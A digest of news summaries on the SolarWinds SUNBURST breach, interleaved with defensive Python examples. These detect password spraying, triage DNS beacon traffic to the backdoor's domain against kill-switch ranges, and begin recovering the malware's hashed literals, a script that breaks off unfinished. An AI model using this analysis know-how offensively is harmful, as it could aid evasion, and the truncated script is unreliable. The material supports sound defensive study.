The number of federal agencies hit by the SolarWinds Orion breach will likely surpass the White House’s tally of 10, according to the director of the National Counterintelligence and Security Center. The number of organizations affected by the SolarWinds hack will likely rise as investigators continue to manage the fallout.

Ref - GCN

_______________________________________________________________________________________

(January 13, 2021)


SolarWinds attackers could have targeted Mimecast pursuing multiple paths

The discovery of a data breach at email service provider Mimecast could indicate attackers behind the massive SolarWinds incident may have pursued multiple paths to infiltrate target organizations. However, Mimecast no longer uses the SolarWinds Orion network management software.


_______________________________________________________________________________________

(January 13, 2021)

Microsoft President: SolarWinds attack violated ‘norms and rules’ of government activities

In a pre-recorded keynote address during the digital CES 2021 conference, Microsoft President Brad Smith has called on governments of the world to hold to a higher standard to prevent supply chain attacks similar to SolarWinds Orion. In addition, the tech industry will need to work with both government and non-governmental agencies to address such critical cybersecurity issues.

Ref - CRN

_______________________________________________________________________________________

(January 13, 2021)


SolarWinds hack followed years of warnings of weak cybersecurity

The Cyberspace Solarium Commission, which was created to develop strategies to thwart sizable cyber-attacks, had presented a set of recommendations to Congress in March that included additional safeguards to ensure more trusted supply chains. More than 75 of the highest priority recommendations were not fully addressed by the agencies.

Ref - Bloomberg

_______________________________________________________________________________________

(January 13, 2021)


SolarWinds risk assessment resources for Microsoft 365 and Azure

Several government and private organizations, including Microsoft, have released a wealth of information and tools for assessing exposure to SolarWinds-like attacks. These resources can help organizations prepare an appropriate response to SolarWinds-related activity in their Microsoft 365 and Azure environments.

Ref - CSO Online 

_______________________________________________________________________________________

(January 12, 2021)


SolarWinds claimed to have found the source of a massive cyberattack

Software provider SolarWinds revealed that it has found the source of the highly sophisticated malicious code injection it believes was used by the perpetrators of the recent cyberattack on the company and its clients, including federal government agencies. It was able to reverse engineer the code, learning more about the tool that was developed and deployed into its build environment.


_______________________________________________________________________________________

(January 12, 2021)


SolarWinds attack - Involvement of Mimecast customers further escalate the risks

The Mimecast hackers used tools and techniques that link them to the hackers who broke into Austin, Texas-based SolarWinds Corp. This new revelation by Mimecast potentially adds thousands of victims to the years-long intelligence operation and likely aimed at gaining access to email systems.


_______________________________________________________________________________________

(January 12, 2021)


New findings in SolarWinds attack fills out the timeline of Russia-linked campaign

Based on a continuing investigation, SolarWinds Corp. has said that the Russia-linked hackers, who accessed U.S. government systems and corporate networks via SolarWinds Orion supply chain attacks, were accessing its systems since early September 2019. A month later, a version of the company’s Orion Platform software was found, that appears to have contained modifications designed to test the hacker’s ability to insert malicious code into the system.


_______________________________________________________________________________________

(January 12, 2021)


Cisco’s response towards the SolarWinds Orion platform attack

Cisco has provided updates on its investigation, answers to common questions, available Indicators of Compromise (IOCs), and recommendations for its customers regarding the recent SolarWinds attacks. Cisco said that Orion was installed on a small number of Cisco assets.

Ref - Cisco 

_______________________________________________________________________________________

(January 12, 2021)


SUNSPOT and new malware family associations

In its recent update, Rapid7 talks about two recent developments regarding the SolarWinds attacks. First is about CrowdStrike’s technical analysis of the "SUNSPOT" malware that was used to insert the SUNBURST backdoor into SolarWinds Orion software builds. Another is the technical analysis from researchers at Kaspersky about their discovery of feature overlap between the SUNBURST malware code and the Kazuar backdoor.

Ref - Rapid7

_______________________________________________________________________________________

(January 12, 2021)


The perpetrators spent months inside SolarWinds’ software

New research into the SolarWinds attack shows the perpetrators spent months inside the company’s software development labs, honing their attack before inserting malicious code into updates that SolarWinds then shipped to thousands of customers. And such insidious methods could be repurposed against many other major software providers as well.


_______________________________________________________________________________________

(January 12, 2021)


'SolarLeaks' website claims to sell data stolen in SolarWinds attacks

A website named 'SolarLeaks' is selling data they claim was stolen from companies confirmed to have been breached in the SolarWinds attack. The website hosted on the domain solarleaks[.]net claims to be selling the stolen data from Microsoft, Cisco, FireEye, and SolarWinds.


_______________________________________________________________________________________

(January 12, 2021)


Mimecast certificate was compromised by hackers for Microsoft authentication

Mimecast has disclosed that a sophisticated threat actor had compromised a Mimecast certificate used to authenticate several of the company’s products to Microsoft 365 Exchange Web Services.

Ref - CRN 

_______________________________________________________________________________________

(January 12, 2021)


New SolarWinds CEO sets out a recovery path to pull through the major attack

According to Sudhakar Ramakrishna, the new CEO of SolarWinds, the most crucial of the next steps will involve securing SolarWinds’ internal environment through deploying additional, robust threat protection and threat hunting software on its network, particularly across developer environments.

Ref - ARNnet 

_______________________________________________________________________________________

(January 12, 2021)


Kaspersky Lab reveals evidence on SolarWinds breach

Kaspersky Lab has said that the SolarWinds hackers may be linked to the Turla group, which is associated with Russia's FSB security service. Analyzing the backdoor secretly implanted in SolarWinds' Orion product, its researchers found several features that overlap with a previously identified backdoor known as Kazuar.


_______________________________________________________________________________________

(January 12, 2021)


Third malware strain identified in SolarWinds breach

Cyber-security firm CrowdStrike said that it has identified a third malware strain directly involved in the recent SolarWinds hack. Named Sunspot, this finding adds to the previously discovered SUNBURST (Solorigate) and Teardrop malware strains. CrowdStrike believes that SUNSPOT was actually the first of the three to be used.

Ref - ZDNet

_______________________________________________________________________________________

(January 12, 2021)


FBI investigating Russian-linked postcard sent to FireEye CEO after uncovering SolarWinds incident

The FBI is investigating a mysterious postcard sent to the home of cybersecurity firm FireEye’s chief executive. The postcard was sent just a few days after the organization had found initial evidence of a suspected Russian hacking operation on dozens of U.S. government agencies and private American companies. U.S. officials familiar with the postcard are investigating whether it was sent by people associated with a Russian intelligence service due to its timing and content. The sender was attempting to “troll” or push the company off the trail by intimidating a senior executive.

Ref - Reuters

_______________________________________________________________________________________

(January 11, 2021)


More details revealed about the SUNBURST attack

SolarWinds says it has found a highly sophisticated and novel malicious code injection source that the perpetrators used to insert the SUNBURST code into builds of its Orion Platform software. By managing the intrusion through multiple servers based in the U.S. and mimicking legitimate network traffic, the attackers were able to circumvent the threat detection techniques employed by SolarWinds, other private companies, and the federal government.


_______________________________________________________________________________________

(January 11, 2021)


Indicators of Compromise for SUNBURST malware

Most of the SolarWinds attack-related IOCs published by researchers so far only indicate that a backdoored SolarWinds Orion update has been installed; they do not show whether the backdoor was actually used by the attackers. The network-based events described by Netresec, in particular the DNS responses the backdoor receives for its avsvmcloud[.]com beacon queries, indicate that a host has been actively targeted and that SUNBURST has progressed beyond its initial, passive mode of operation. According to this research, Palo Alto Networks was also among the targeted victims.

Ref - Netresec

_______________________________________________________________________________________

(January 11, 2021)


SolarWinds attack one of the most sophisticated and complex attacks in history

The new CEO of SolarWinds has described the recent attacks on SolarWinds as one of the most complex and sophisticated cyberattacks in history. SolarWinds, KPMG, and CrowdStrike were able to locate the malicious code injection source, and reverse-engineer it to learn more about the tool that was developed and deployed into SolarWinds’ build environment.

Ref - CRN 

_______________________________________________________________________________________

(January 11, 2021)


SolarWinds attack may cost as much as $100 billion

According to recent research, American businesses and government agencies may need to spend more than $100 billion over many months to contain and fix the damage from the Russian hack against the SolarWinds software used by so many Fortune 500 companies and U.S. government departments.

Ref - Roll Call

_______________________________________________________________________________________

(January 11, 2021)


A stealthy code was used to launch the SolarWinds hacking attack

SolarWinds says that it has identified the malicious code that attackers used to manipulate its software and remain undetected for months. The code was designed to inject another piece of custom malicious software into Orion during the build, without arousing the suspicion of SolarWinds' software development and build teams.


_______________________________________________________________________________________

(January 11, 2021)


SolarWinds breach could be linked to Turla APT

New details disclosed about the Sunburst backdoor, which was used in the sprawling SolarWinds supply-chain attack, potentially link it to previously known activity by the Turla APT group. Researchers at Kaspersky have uncovered several code similarities between Sunburst and the Kazuar backdoor.


_______________________________________________________________________________________

(January 11, 2021)


SolarWinds supply chain attack is a lesson to learn

After all the recent discoveries made about the SolarWinds hack, it is already clear that the scope is extensive, and the full impact will likely prove to be devastating. Organizations should attempt to create a "cyber kill chain" for supply chain compromises, in order to prevent, disrupt, or at least quickly detect such incidents before weaponized software has the opportunity to cause damage.


_______________________________________________________________________________________

(January 11, 2021)


There could be more undisclosed federal victims of SolarWinds breach: CISA

Brandon Wales, CISA's acting director, has said that the number of federal agencies breached in the suspected Russian espionage campaign will likely increase as the investigation continues. He added, however, that the number will remain extremely small because of the highly targeted nature of the campaign, and that this holds for both the government and the private-sector entities that were compromised.


_______________________________________________________________________________________

(January 11, 2021)


New details emerged from an investigation of SUNBURST

Security experts investigating the breach are providing an update on the investigation thus far, including an important development that could bring investigators closer to understanding how this serious attack was carried out. They believe that they have found the highly sophisticated and novel malicious code injection source the perpetrators used to insert the SUNBURST code into builds of the Orion Platform software.


_______________________________________________________________________________________

(January 11, 2021)


The attacker behind the SolarWinds breach also targeted O365 accounts

The threat actors behind the SolarWinds attack appear to have also compromised Microsoft 365 and Azure application accounts. Once the threat actor has impersonated a privileged Azure AD account, for example by forging SAML tokens or adding credentials to an existing application, they can further manipulate the Azure/M365 environment to act on their objectives in the cloud.

Ref - Duo

_______________________________________________________________________________________

(January 11, 2021)


SUNBURST backdoor shares features with Russian APT malware

Kaspersky researchers have found that the Sunburst backdoor shows several feature overlaps with Kazuar, a .NET backdoor tentatively linked to the Russian Turla hacking group. Turla is the main suspect behind earlier attacks targeting the Pentagon, NASA, U.S. Central Command, and the Finnish Foreign Ministry.


_______________________________________________________________________________________

(January 11, 2021)


The SolarWinds hack is different than previous breaches

What sets the SolarWinds attack apart from previous incidents is its sheer scale. The company has over 300,000 customers worldwide, according to filings made to the U.S. Securities and Exchange Commission. The trojanized Orion updates it shipped in 2020 were installed by as many as 18,000 of them, although only a small fraction of those were subsequently selected for hands-on intrusion.


_______________________________________________________________________________________

(January 11, 2021)


Technical analysis of SUNSPOT malware

CrowdStrike has published a technical analysis of SUNSPOT, the malicious tool that was deployed into SolarWinds' build environment to inject the SUNBURST backdoor into the Orion platform without arousing the suspicion of the development team charged with delivering the product. CrowdStrike attributes SUNSPOT to the actor it tracks as StellarParticle. The tool watched for Orion build jobs on the build server, swapped a backdoored source file into the build while it ran, and restored the original afterwards, so neither the source repository nor the developers' own checkouts showed the change.


_______________________________________________________________________________________

(January 8, 2021)


Chris Krebs and Alex Stamos team up against SolarWinds attacks

SolarWinds, which has been embroiled in a recent, wide-scale hack, has called in two security powerhouses for help: Former director of the Cybersecurity and Infrastructure Security Agency (CISA) Chris Krebs, and former Facebook security executive Alex Stamos.

Ref - Threatpost

_______________________________________________________________________________________

(January 8, 2021)


Spotting post-compromise threat activity in Microsoft Cloud Environments

CISA released an alert, stating that it has observed an APT actor using compromised applications in a victim’s Microsoft 365 (M365)/Azure environment. CISA has also seen this APT actor utilizing additional credentials and Application Programming Interface (API) access to cloud resources of private and public sector organizations.

Ref - US-CERT

_______________________________________________________________________________________

(January 8, 2021)


The SolarWinds attacker used password guessing and password spraying attacks

The US Cybersecurity and Infrastructure Security Agency (CISA) has stated that the threat actor behind the SolarWinds hack also used password guessing and password spraying attacks to breach targets as part of its recent hacking campaign and didn't always rely on the trojanized updates as its initial access vector.

Ref - ZDNet
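Because the actor did not always arrive through the trojanized update, initial-access detection has to cover spraying as well. The script below is an added example, not CISA's or any vendor's code: it flags sources whose failed logons are spread thinly across many accounts, which is the spraying signature that per-account lockout rules miss, and it deliberately does not match a classic brute force against one account. The log format, source addresses, and account names are constructed.

```python
"""Flag password-spraying sources in an authentication log.

Added example, not CISA's or SolarWinds' code. Spraying tries one or two
common passwords against many accounts from the same source, so every
account sees only a failure or two and per-account lockout never fires.
The check therefore pivots on the source: many distinct accounts, few
failures per account, inside a short window.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Constructed log format: ISO-8601 UTC timestamp, source, user, outcome.
LINE_RE = re.compile(
    r"^(?P<ts>\S+) src=(?P<src>\S+) user=(?P<user>\S+) result=(?P<result>OK|FAIL)$")


def parse(line: str):
    """Return the parsed record, or None for lines that do not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.fromisoformat(rec["ts"].replace("Z", "+00:00"))
    return rec


def detect_spray(lines, window=timedelta(minutes=30), min_users=8, max_per_user=3):
    """Return {source: sorted sprayed accounts} for sources that, within any
    `window`, failed against at least `min_users` accounts with no more than
    `max_per_user` failures on any one of them."""
    failures = defaultdict(list)                     # src -> [(ts, user)]
    for line in lines:
        rec = parse(line)
        if rec and rec["result"] == "FAIL":
            failures[rec["src"]].append((rec["ts"], rec["user"]))

    hits = {}
    for src, events in failures.items():
        events.sort()
        sprayed = set()
        start = 0
        for end in range(len(events)):               # sliding time window
            while events[end][0] - events[start][0] > window:
                start += 1
            per_user = defaultdict(int)
            for _, user in events[start:end + 1]:
                per_user[user] += 1
            if len(per_user) >= min_users and max(per_user.values()) <= max_per_user:
                sprayed.update(per_user)
        if sprayed:
            hits[src] = sorted(sprayed)
    return hits


def _stamp(t: datetime) -> str:
    return t.strftime("%Y-%m-%dT%H:%M:%SZ")


def build_sample_log():
    """Constructed sample: one spray, one brute force, one ordinary user."""
    base = datetime(2021, 1, 5, 2, 0, tzinfo=timezone.utc)
    lines = []
    for i in range(12):                              # spray: 12 accounts, one failure each
        lines.append(f"{_stamp(base + timedelta(minutes=i))} src=198.51.100.7 user=user{i:02d} result=FAIL")
    for i in range(30):                              # brute force: one account, 30 failures
        lines.append(f"{_stamp(base + timedelta(seconds=10 * i))} src=198.51.100.8 user=admin result=FAIL")
    lines.append(f"{_stamp(base)} src=10.0.0.5 user=alice result=FAIL")   # a typo, then success
    lines.append(f"{_stamp(base + timedelta(seconds=30))} src=10.0.0.5 user=alice result=OK")
    return lines


SAMPLE_LOG = build_sample_log()

if __name__ == "__main__":
    for src, users in detect_spray(SAMPLE_LOG).items():
        print(f"{src}: sprayed {len(users)} accounts: {', '.join(users)}")
```

Since this actor staged its activity from U.S.-based servers and kept rates low, a single source address may not cross the threshold; the same logic should also be run keyed on user agent or ASN, and any success from a source that was spraying shortly before is the event to escalate.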

_______________________________________________________________________________________

(January 7, 2021)

US Judiciary adding safeguards and security procedures after SolarWinds hack

The Administrative Office of the U.S. Courts is investigating a potential compromise of the federal courts' case management and electronic case files system. The US Judiciary is also working on immediately adding extra safeguards and security procedures to protect the highly sensitive court documents (HSDs) filed with the courts, by having security audits related to vulnerabilities, and defining new rules for storing confidential documents.


_______________________________________________________________________________________

(January 7, 2021)


A 'Severity-Zero alert' led to the discovery of SolarWinds breach

FireEye's CEO shared some insight on the cyberattack against the security firm that became the first clue to a massive and wide-ranging campaign. He described how the company first recognized the attack it had suffered: a new phone registered for multi-factor authentication on an existing FireEye user account was the first indication of malicious activity, and the security team treated it as a "severity-zero" alert.


_______________________________________________________________________________________

(January 7, 2021)


Sealed U.S. court records compromised in SolarWinds breach

Backdoored SolarWinds products may have jeopardized the confidentiality of countless sealed court documents on file with the U.S. federal court system. An apparent compromise of the confidentiality of the Case Management/Electronic Case Files (CM/ECF) system, arising from the discovered vulnerabilities, is currently under investigation.


_______________________________________________________________________________________

(January 6, 2021)


SolarWinds hackers had access to Microsoft O365 email server

The US Department of Justice confirmed that the Russian state-sponsored hackers behind the SolarWinds supply chain attack targeted its IT systems, and potentially accessed the O365 mailboxes of some of the users. The number of impacted DOJ employees is currently believed to be around 3,000 to 3,450.

Ref - ZDNet

_______________________________________________________________________________________

(January 5, 2021)


Concerns over Microsoft’s source code exposure in the SolarWinds attack

Microsoft revealed that its investigation of SolarWinds breach had found no evidence of unauthorized access to its production services or customer data, but that effort did uncover another attack attempt. The tech giant has an “inner source approach” that makes source code viewable within Microsoft. Even so, such an attempt raises some important questions about the types of risks that Microsoft might still be facing as a result of this exposure.


_______________________________________________________________________________________

(January 5, 2021)


The U.S. now formally blames Russia for SolarWinds breach

Four US cyber-security agencies, including the FBI, CISA, ODNI, and the NSA, have released a joint statement today formally accusing the Russian government of orchestrating the SolarWinds supply chain attack. US officials said that an Advanced Persistent Threat (APT) actor, likely Russian in origin, was responsible for the SolarWinds hack.

Ref - ZDNet

_______________________________________________________________________________________

(January 5, 2021)


Critical infrastructure could join the list of potential targets 

Researchers have started to piece together a picture of the SolarWinds intrusion using the information found in the networks of U.S. agencies and companies. But there’s another potential group of victims who haven’t yet disclosed any attacks, in part because they may not yet know. That is America’s critical infrastructure, which includes everything from bridges and airports to the electrical grid and hydroelectric dams.

Ref - Bloomberg

_______________________________________________________________________________________

(January 5, 2021)


SolarWinds breach raises concerns over Windows updates

Recently, Microsoft announced that its Windows source code had been viewed by the SolarWinds attackers, raising concerns among Microsoft customers. The SolarWinds attack has raised serious questions about how safe companies (and government agencies) are when OS or software updates roll out.


_______________________________________________________________________________________

(January 4, 2021)


SolarWinds facing a class-action lawsuit for alleged securities violations

The first class-action lawsuit brought against SolarWinds following its breach accuses the company of making materially false and misleading statements about its security posture throughout 2020. The suit alleges that SolarWinds, its outgoing CEO, and its CFO made false and/or misleading statements in regulatory filings with the U.S. Securities and Exchange Commission in February, May, August, and November of 2020.

Ref - CRN

_______________________________________________________________________________________

(January 4, 2021)


SolarWinds confirms additional SUPERNOVA malware targeting Orion product

The extent and impact of the SolarWinds hack have become even more apparent over the holiday break. SolarWinds has confirmed the SUPERNOVA malware, which is distinct from the SUNBURST supply chain compromise: it is placed separately on an Orion server by an attacker who already has unauthorized access to the customer's network, it exploits a separate Orion vulnerability rather than the trojanized update, and it is designed to appear to be part of a SolarWinds product.


_______________________________________________________________________________________

(January 4, 2021)


SolarWinds hack - Microsoft’s software blueprints acquired but not altered

The latest results of an ongoing investigation by Microsoft revealed that the sophisticated attackers behind the SolarWinds cyber-espionage operation were able to use compromised accounts to access the blueprints of Microsoft’s software. Attackers were able to acquire the blueprints, but they could not alter them, Microsoft said.


_______________________________________________________________________________________

(January 4, 2021)


The SolarWinds attack could be worse than expected

The SolarWinds attack may prove even more damaging to U.S. national security and business prosperity than first thought. The latest reports reveal that the Russian attackers may even have accessed the crown jewels of the Microsoft software stack: the source code of Windows and Office. Though there were no explosions and no deaths, the incident has been likened to a Pearl Harbor for American IT.

Ref - ZDNet

______________________________________________________________________________________

(January 4, 2021)


SolarWinds hack - A global attack

Recent evidence suggests that a number of cyber-defense missteps may have helped the attackers in their efforts. Early warning sensors placed by Cyber Command and the National Security Agency (NSA) evidently failed, and the attackers were using US-based servers to prevent getting caught.

Ref - TechRadar 

_______________________________________________________________________________________

(January 4, 2021)


UNC2452's attack methods continue to puzzle security researchers

The attack methods used by the SolarWinds attackers suggest deep knowledge and understanding of SolarWinds' entire SDLC. It is possible that the attackers were monitoring the version control server so they could prepare the necessary changes on top of each legitimate update. Alternatively, they may have compromised the build process itself (e.g. a build script) and, during the build, substituted the legitimate SolarWinds.Orion.Core.BusinessLayer.dll with the malicious version.

Ref - Medium

_______________________________________________________________________________________

(January 4, 2021)


How the SolarWinds hackers used SUNBURST and SUPERNOVA against Orion products

The attackers trojanized SolarWinds Orion platform versions 2019.4 HF 5 through 2020.2.1, released between March and June 2020. These trojanized updates were downloaded by as many as 18,000 private and public organizations. The SUNBURST backdoor carried in those updates gave the attackers their foothold, and the separate SUPERNOVA web shell was also used against some victims.

Ref - TEISS 

_______________________________________________________________________________________

(January 4, 2021)


The massive Russian hack was waged inside the U.S.

Russian hackers staged their attacks from servers inside the U.S., sometimes using computers in the same town or city as the victims, according to cybersecurity company FireEye. The attack, attributed to Russia, began with the targeting of the software of IT contractor SolarWinds.

Ref - Axios

_______________________________________________________________________________________

(January 3, 2021)


SUPERNOVA forensic details by using Code Property Graph

The fallout of the SolarWinds compromise has resulted in the identification of several new malware families, each with different characteristics and behaviors. Security experts recently described how the weaponized DLL was patched into SolarWinds' Software Development Life Cycle (SDLC) after the initial infiltration, and they also detailed the detection-evasion techniques employed by the APT actor behind this attack.


_______________________________________________________________________________________

(January 3, 2021)


SolarWinds was warned in 2017 about the risk of 'catastrophic' breach

A cybersecurity adviser says he had warned SolarWinds of a potential 'catastrophic' hacking attack if the company didn't amp up internal security measures three years before Russians compromised their software. The firm's moving of some operations to Eastern Europe may have exposed it to the massive Russian hack.

Ref - Dailymail

_______________________________________________________________________________________

(January 2, 2021)


The growing danger of Russia-based hack attacks

It now appears that the SolarWinds breach is far broader than first believed. Russia exploited multiple layers of the supply chain to gain access to as many as 250 networks. And all the “Early warning” sensors placed by Cyber Command and the National Security Agency deep inside foreign networks to detect brewing attacks clearly failed.


_______________________________________________________________________________________

(December 31, 2020)


Microsoft’s source code was accessed by SolarWinds hackers 

The hacking group behind the SolarWinds compromise was able to break into Microsoft Corp and access some of its source code. It is not clear how much or what parts of Microsoft’s source code repositories the hackers were able to access. However, being able to review the code could offer hackers insight that might help them subvert Microsoft products or services.

Ref - Reuters

_______________________________________________________________________________________

(December 31, 2020)


The SolarWinds attack is a wake-up call for the U.S.

The recent major SolarWinds hack compromised the Department of Homeland Security, the State Department, the US Treasury, and also impacted several IT giants including Microsoft, Cisco, VMware, FireEye, and many more. The huge investment made by the U.S. in technology, which is a key strength of the US economy, is also making it vulnerable to such attacks.

Ref - Forbes

_______________________________________________________________________________________

(December 30, 2020)


All U.S. federal agencies ordered to update the SolarWinds Orion platform

CISA has ordered all U.S. federal agencies to update the SolarWinds Orion platform to the latest version by the end of business on December 31, 2020. CISA's Supplemental Guidance to Emergency Directive 21-01 requires this of all agencies running Orion versions that were not affected by the supply chain attack; agencies that ran affected versions remain covered by the directive's original requirements.


_______________________________________________________________________________________

(December 30, 2020)


The cyberattack on SolarWinds may have started earlier than current estimates

The vice-chairman of the Senate Intelligence Committee claims that the cyberattacks on U.S. government agencies reported in December may have begun earlier than previously believed. According to him, the initial burrowing may have started earlier, however, there is no evidence suggesting that classified government secrets were compromised.

Ref - The Hill

_______________________________________________________________________________________

(December 30, 2020)


It is too early to make attribution for SolarWinds attack

The recent expansive intrusion of the SolarWinds campaign affected over half a dozen U.S. government agencies. Several individuals and agencies, including members of the U.S. Congress, have publicly accused Russia. However, the lack of public evidence gives rise to claims that other actors, perhaps even other countries, may be responsible, a claim made by President Donald Trump as well.


_______________________________________________________________________________________

(December 30, 2020)


NSA validates updated version of SolarWinds Orion Platform - CISA issues emergency directive

After the release of SolarWinds Orion Platform version 2020.2.1 HF 2, the National Security Agency (NSA) examined the update and verified that it eliminates the previously identified malicious code. CISA issued an emergency directive to help organizations mitigate the SolarWinds Orion code compromise.

Ref - DHS

_______________________________________________________________________________________

(December 29, 2020)


SolarWinds hackers were looking for victims' cloud data

According to Microsoft, the end goal of the SolarWinds supply chain compromise was to pivot to the victims' cloud assets after deploying the Sunburst/Solorigate backdoor on their local networks. After the initial widespread foothold, the attackers could pick and choose the specific organizations they want to continue operating within.


_______________________________________________________________________________________

(December 29, 2020)


Qualys researchers analyze over 7.54 million vulnerable instances related to FireEye Red Team tools

An analysis of the 7.54 million vulnerable instances indicated that about 99.84% (roughly 7.53 million) are from only eight vulnerabilities in Microsoft’s software. For all these eight vulnerabilities, including CVE-2020-1472 and CVE-2020-0688, Microsoft patches have been available for a while.

Ref - Qualys 

_______________________________________________________________________________________

(December 29, 2020)


UAE-based entities targeted in the SolarWinds breach

The National Cybersecurity Council has reported that UAE-based entities were targeted in the SolarWinds cyber-attack and that steps were taken to secure constituencies. In addition, the government body is also taking all precautions and procedures necessary to safeguard the UAE's digital infrastructure, stop cyber-attacks, and ensure quick recovery from such incidents.


_______________________________________________________________________________________

(December 29, 2020)


NETRESEC updates its tool to identify security products installed on Trojanized SolarWinds Orion deployments

NETRESEC's free SunburstDomainDecoder tool (v1.7) can be used to identify the endpoint protection products installed on trojanized SolarWinds Orion deployments. The security product information is extracted from the DNS queries SUNBURST sends for avsvmcloud[.]com subdomains, which the backdoor uses as its first-stage beacon and C2 channel; each queried subdomain encodes the victim's domain name and the status of selected security products on the host.

Ref - Netresec 
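The Jan 11 entry above on SUNBURST IOCs makes the point that most indicators only prove a backdoored Orion build was installed, while the DNS responses to the avsvmcloud[.]com beacon show whether a host was actually selected. The following script, an added example and not Netresec's or FireEye's code, triages passive-DNS records along those lines. It assumes a constructed "timestamp client query rtype answer" log format, made-up subdomain labels and documentation-range addresses, and takes the kill-switch address ranges from FireEye's public analysis (re-check them against the IOC references on this page before relying on them). The CNAME target used in the sample is a placeholder; the classification does not depend on it.

```python
"""Triage passive-DNS records for SUNBURST beacon activity.

Added example, not Netresec's or FireEye's code. Each internal host that
queried the beacon domain is put in one of three states, following the
response behaviour described in public analyses: an A record inside one of
the "kill switch" ranges makes the backdoor go dormant, a CNAME response
means the operators selected the host for second-stage HTTP C2, and any
other A record is a first-stage beacon with no evidence of follow-on use.
"""
import ipaddress

BEACON_DOMAIN = "avsvmcloud.com"

# Ranges that cause SUNBURST to stop beaconing, as reported in FireEye's
# public analysis (assumption: verify against current IOC lists).
KILLSWITCH_RANGES = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "224.0.0.0/3",
    "20.140.0.0/15", "96.31.172.0/24", "131.228.12.0/22", "144.86.226.0/24",
    "fc00::/7", "fec0::/10", "ff00::/8",
)]

# When a host shows more than one state, the most concerning one wins.
SEVERITY = {"stage2": 3, "beacon": 2, "killswitch": 1}


def classify_response(rtype: str, answer: str) -> str:
    """Map one DNS answer to a beacon query onto a SUNBURST state."""
    if rtype == "CNAME":
        return "stage2"          # host selected: HTTP C2 via the CNAME target
    if rtype in ("A", "AAAA"):
        addr = ipaddress.ip_address(answer)
        if any(addr in net for net in KILLSWITCH_RANGES):
            return "killswitch"  # backdoor disables itself
        return "beacon"          # first-stage beacon only
    raise ValueError(f"unexpected record type {rtype}")


def parse_line(line: str):
    """Parse the constructed 'timestamp client query rtype answer' format."""
    ts, client, query, rtype, answer = line.split()
    return ts, client, query.rstrip(".").lower(), rtype.upper(), answer


def triage(lines):
    """Return {client_ip: worst_state} for hosts that queried the beacon domain."""
    worst = {}
    for line in lines:
        if not line.strip() or line.startswith("#"):
            continue
        _, client, query, rtype, answer = parse_line(line)
        if not query.endswith("." + BEACON_DOMAIN):
            continue
        state = classify_response(rtype, answer)
        if SEVERITY[state] > SEVERITY.get(worst.get(client), 0):
            worst[client] = state
    return worst


# Constructed sample log: labels are made up, 203.0.113.0/24 is a
# documentation range, and c2.example.net stands in for the CNAME target.
SAMPLE_LOG = """
2020-06-11T10:02:15Z 10.1.2.3 7sbvaemscs0mc925tb99.appsync-api.us-west-2.avsvmcloud.com A 203.0.113.10
2020-06-11T10:32:19Z 10.1.2.3 r1q6arhpujcf6jb6qqqq.appsync-api.eu-west-1.avsvmcloud.com CNAME c2.example.net
2020-06-11T11:01:00Z 10.1.2.4 k5kcubuassl3alrf7gm3.appsync-api.us-east-2.avsvmcloud.com A 203.0.113.11
2020-06-11T11:05:42Z 10.1.2.5 gq1h856599gqh538acqn.appsync-api.us-east-1.avsvmcloud.com A 10.99.1.1
2020-06-11T11:06:00Z 10.1.2.6 www.example.com A 203.0.113.12
""".strip().splitlines()

if __name__ == "__main__":
    for host, state in sorted(triage(SAMPLE_LOG).items()):
        print(f"{host:12} {state}")
```

A host in the "beacon" state still had a backdoored build installed and should be rebuilt per the directive; the "stage2" hosts are the ones that warrant full incident response, including the cloud identity checks described elsewhere on this page. Decoding the victim domain and security-product bits from the subdomain itself is what Netresec's SunburstDomainDecoder does and is not repeated here.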

_______________________________________________________________________________________

(December 28, 2020)


Microsoft shares information for partners on using Microsoft 365 Defender to protect against Solorigate

Microsoft has published a comprehensive guide to provide information to customers and partners about securing their environment and answering their questions related to the recent SolarWinds attacks. It also provides additional links and information for Microsoft partners.


_______________________________________________________________________________________

(December 28, 2020)


More supply chain attacks like SolarWinds expected in 2021

SolarWinds, Vietnam Government Certification Authority, Able Desktop, GoldenSpy and Wizvera VeraPort are some of the prominent Supply chain attacks the world has observed in recent times. Now, almost all security researchers agree that more such supply-chain attacks will happen, especially attacks on the software development lifecycle and that security teams need to sharpen their strategies.


_______________________________________________________________________________________

(December 28, 2020)


CISA's PowerShell-based tool Sparrow can detect malicious activities related to SolarWinds attack

SolarWinds threat actors were found actively using stolen credentials and access tokens to target Azure customers. CISA's Cloud Forensics team has prepared a malicious activity detection tool dubbed Sparrow, which can check for compromised Azure accounts. This tool can check the unified Azure/M365 audit log for known IoCs, provide a list of Azure AD domains, and also check for Azure service principals and their Microsoft Graph API permissions to discover potential malicious activity. 


_______________________________________________________________________________________

(December 28, 2020)


A different threat actor may have used Supernova malware, exploiting a new zero-day vulnerability

It has been discovered that the Supernova malware is designed to exploit a previously unknown vulnerability, tracked as CVE-2020-10148, which can allow a remote attacker to execute API commands. This zero-day flaw may have been used by a second threat actor, unrelated to the first, to target the SolarWinds Orion platform.

Ref - SecurityWeek 

_______________________________________________________________________________________

(December 28, 2020)


Using ShiftLeft’s Code Property Graph to explore SolarWinds Sunburst backdoor

Reversing the Sunburst binaries revealed several rough edges in the SolarWinds espionage operation. The attacker used the FNV-1a (Fowler-Noll-Vo) hash combined with an XOR to obfuscate all of the hardcoded literals in the codebase, such as the names of the security processes, services, and drivers the backdoor checks for before activating. A navigation workflow of the Sunburst malware has also been disclosed.
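The hashing scheme just described is what kept the backdoor's blocklist unreadable in the binary, and also why analysts could recover it anyway. The script below is an added example, not ShiftLeft's or any vendor's code: it implements FNV-1a-64 plus XOR as the transform, then brute-forces a constructed demo blocklist with a candidate list. The XOR constant is the value reported in public decompilations and is an assumption here; the lower-casing of names before hashing follows the same analyses. The demo names and wordlist are made up.

```python
"""Recover SUNBURST-style hashed literals with a candidate list.

Added example, not ShiftLeft's or any vendor's code. The backdoor does not
store the process, service and driver names it checks as strings: each
name is lower-cased, hashed with 64-bit FNV-1a and XORed with a fixed key,
and the result is compared with the same transform of every running
process. The transform is one-way, but the input space (security product
names) is tiny, so a wordlist recovers the plaintexts.
"""
FNV64_OFFSET = 0xCBF29CE484222325      # standard FNV-1a 64-bit parameters
FNV64_PRIME = 0x100000001B3
MASK64 = (1 << 64) - 1

# Assumption: XOR key as reported in public decompilations of SUNBURST.
# Substitute the constant from your own sample if it differs.
SUNBURST_XOR_KEY = 6605813339339102567


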